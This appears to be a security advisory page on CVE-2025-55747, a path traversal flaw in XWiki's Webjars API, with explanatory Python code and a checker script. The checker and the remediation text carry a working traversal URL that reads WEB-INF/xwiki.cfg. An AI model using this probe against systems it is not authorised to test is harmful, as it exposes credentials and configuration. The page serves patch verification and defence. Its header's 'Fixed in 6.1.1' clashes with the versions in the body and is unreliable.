Platform
java
Component
org.xwiki.platform:xwiki-platform-webjars-api
Fixed in
6.1.1
16.10.7
CVE-2025-55747 is a path traversal vulnerability in the XWiki Platform Webjars API. It lets an attacker read sensitive configuration files by manipulating the URL of a webjar resource request, bypassing the access controls that normally keep those files private. Affected are XWiki Platform versions prior to 16.10.7 and, on the 17.x line, versions prior to 17.4.0-rc-1; patched releases are available.
The primary impact of CVE-2025-55747 is unauthorized disclosure of sensitive information. By crafting a URL whose path contains percent-encoded parent-directory segments (..%2F), an attacker makes the webjars API resolve a file outside the directory it is meant to serve. In particular, the request can reach WEB-INF/xwiki.cfg, the main configuration file of the XWiki platform. Its contents can reveal credentials, keys and other sensitive settings that support further attacks, potentially up to full compromise of the instance. The root cause is the classic one for path traversal: user-controlled path input is not properly validated before it is used in the file lookup, so the traversal segments take effect.
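To make the mechanism concrete, here is an added illustration, not XWiki's code and not its actual fix, of why a percent-encoded traversal sequence escapes a resource root, next to a resolver that decodes once, rejects parent-directory segments and checks containment after normalization. The directory layout is hypothetical, chosen so that the five ..%2F segments from the page's URL land on WEB-INF/xwiki.cfg.

```python
import posixpath
from typing import Optional
from urllib.parse import unquote

# Hypothetical deployment layout (not XWiki's real one): the webapp root holds
# WEB-INF/xwiki.cfg, and webjar resources are served from a directory five levels
# below it, so the five "..%2F" segments in the page's URL climb exactly to the root.
WEBAPP_ROOT = "/opt/xwiki/webapp"
WEBJAR_ROOT = WEBAPP_ROOT + "/webjars/wiki/xwiki/v1/static"

# The resource part of the page's URL, after the "wiki%3Axwiki/" prefix, verbatim.
PAGE_TRAVERSAL = "..%2F..%2F..%2F..%2F..%2FWEB-INF%2Fxwiki.cfg"


def resolve_naive(segment: str) -> str:
    """Vulnerable pattern: percent-decode the URL segment and join it onto the root.

    The raw segment contains no literal "/" and no bare ".." element, so a check done
    on the encoded text would pass; after decoding, the parent-directory segments are
    real and normpath() walks out of WEBJAR_ROOT.
    """
    decoded = unquote(segment)
    return posixpath.normpath(posixpath.join(WEBJAR_ROOT, decoded))


def resolve_safe(segment: str) -> Optional[str]:
    """Hardened pattern: decode exactly once, reject traversal, then verify containment.

    Decoding exactly once matters: the check must see the same string the file lookup
    will use. Decoding fewer times than the lookup is the hole (the check passes, the
    lookup traverses); decoding more times only causes spurious rejections.
    """
    decoded = unquote(segment)
    if decoded.startswith("/") or ".." in decoded.split("/"):
        return None
    candidate = posixpath.normpath(posixpath.join(WEBJAR_ROOT, decoded))
    # Even after the segment check, the normalized path must stay under the root.
    if candidate != WEBJAR_ROOT and not candidate.startswith(WEBJAR_ROOT + "/"):
        return None
    return candidate


if __name__ == "__main__":
    print("naive :", resolve_naive(PAGE_TRAVERSAL))
    print("safe  :", resolve_safe(PAGE_TRAVERSAL))
    print("legit :", resolve_safe("jquery/3.7.1/jquery.min.js"))
```

A double-encoded sequence such as %252e%252e%252f decodes once to the literal filename "%2e%2e%2f", which the hardened resolver keeps under the root (the lookup then simply finds nothing); a resolver that decoded twice would be back to the vulnerable behaviour.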
CVE-2025-55747 was publicly disclosed on September 3, 2025. As of that date there are no reports of exploitation in the wild, and the vulnerability is not listed in the CISA KEV catalog. Public proof-of-concept exploits are not widely available, but since exploitation amounts to sending a single crafted URL, unpatched instances should be treated as an easy target.
Exploit Status
EPSS
1.99% (83rd percentile)
CISA SSVC
The fix for CVE-2025-55747 is to upgrade XWiki Platform to 16.10.7 (16.x line) or 17.4.0-rc-1 (17.x line); these releases stop the webjars API from serving files outside the webjar resources. No workaround is known, so upgrading is the real remedy. If you cannot upgrade immediately, a reverse proxy or WAF rule that rejects requests under /webjars/ whose path contains encoded traversal sequences (for example ..%2F or %2e%2e) reduces exposure, but it is a stopgap, not a fix, and must stay in place until the upgrade is done. After upgrading, confirm the fix by requesting the probe URL from the advisory (http://localhost:8080/xwiki/webjars/wiki%3Axwiki/..%2F..%2F..%2F..%2F..%2FWEB-INF%2Fxwiki.cfg, with the host and context path adjusted to your deployment) and verifying that the response is an error rather than the contents of xwiki.cfg.
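The verification step above can be scripted. The following checker is an added example, not part of this page or of XWiki: it sends the page's probe URL to an instance you are authorized to test and classifies the response. The default base URL, the User-Agent string and the heuristic that a body containing "xwiki."-prefixed keys is the real configuration file are this example's own assumptions.

```python
import sys
import urllib.error
import urllib.request

# Probe path from this page's advisory text, relative to the XWiki base URL
# (for example http://localhost:8080/xwiki).
PROBE_PATH = "/webjars/wiki%3Axwiki/..%2F..%2F..%2F..%2F..%2FWEB-INF%2Fxwiki.cfg"


def build_probe_url(base_url: str) -> str:
    """Append the probe path to the instance base URL, tolerating a trailing slash."""
    return base_url.rstrip("/") + PROBE_PATH


def classify(status: int, body: bytes) -> str:
    """Interpret one response to the probe.

    VULNERABLE:   HTTP 200 and the body looks like xwiki.cfg (a properties file whose
                  settings start with "xwiki."). Checking the body guards against a
                  200 that is really a rendered error page.
    DENIED:       the request was refused (4xx), which is what a patched instance does.
    INCONCLUSIVE: anything else (redirect to login, 5xx, 200 without config content).
    """
    text = body.decode("utf-8", errors="replace")
    looks_like_cfg = any(line.lstrip().startswith("xwiki.") for line in text.splitlines())
    if status == 200 and looks_like_cfg:
        return "VULNERABLE"
    if 400 <= status < 500:
        return "DENIED"
    return "INCONCLUSIVE"


def probe(base_url: str, timeout: float = 10.0) -> str:
    """Send the probe once. urllib sends the path verbatim, so the encoded "..%2F" is preserved."""
    req = urllib.request.Request(
        build_probe_url(base_url),
        headers={"User-Agent": "cve-2025-55747-check"},  # assumed, identifies the scan in server logs
    )
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return classify(resp.getcode(), resp.read(64 * 1024))
    except urllib.error.HTTPError as err:
        return classify(err.code, err.read(64 * 1024))


if __name__ == "__main__":
    base = sys.argv[1] if len(sys.argv) > 1 else "http://localhost:8080/xwiki"
    print(build_probe_url(base))
    print(probe(base))
```

Run it as `python check.py https://wiki.example.org/xwiki` against your own instance. A DENIED result is what a patched server returns, but a front-end filter that rejects encoded slashes (%2F) outright produces the same result, so DENIED proves that this URL is blocked, not by itself that the XWiki version is fixed; check the version as well.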
Update XWiki Platform to 16.10.7 or later on the 16.x line, or to 17.4.0-rc-1 or later on the 17.x line. These releases correct the flaw that let the webjars API serve configuration files from outside the webjar resource directory, so those files are no longer reachable through it.
CVE-2025-55747 is a path traversal vulnerability in the XWiki Platform Webjars API that lets an attacker read sensitive configuration files, such as WEB-INF/xwiki.cfg, by manipulating the URL of a webjar request.
Yes. Any XWiki Platform version prior to 16.10.7, or any 17.x version prior to 17.4.0-rc-1, is vulnerable.
Upgrade XWiki Platform to version 16.10.7 or 17.4.0-rc-1. There is no known workaround other than upgrading.
As of September 3, 2025, there are no reports of exploitation in the wild, but because exploitation requires nothing more than a crafted URL, unpatched instances remain an easy target.
You can find the official advisory on the XWiki Jira issue tracker: https://jira.xwiki.org/browse/XWIKI-19350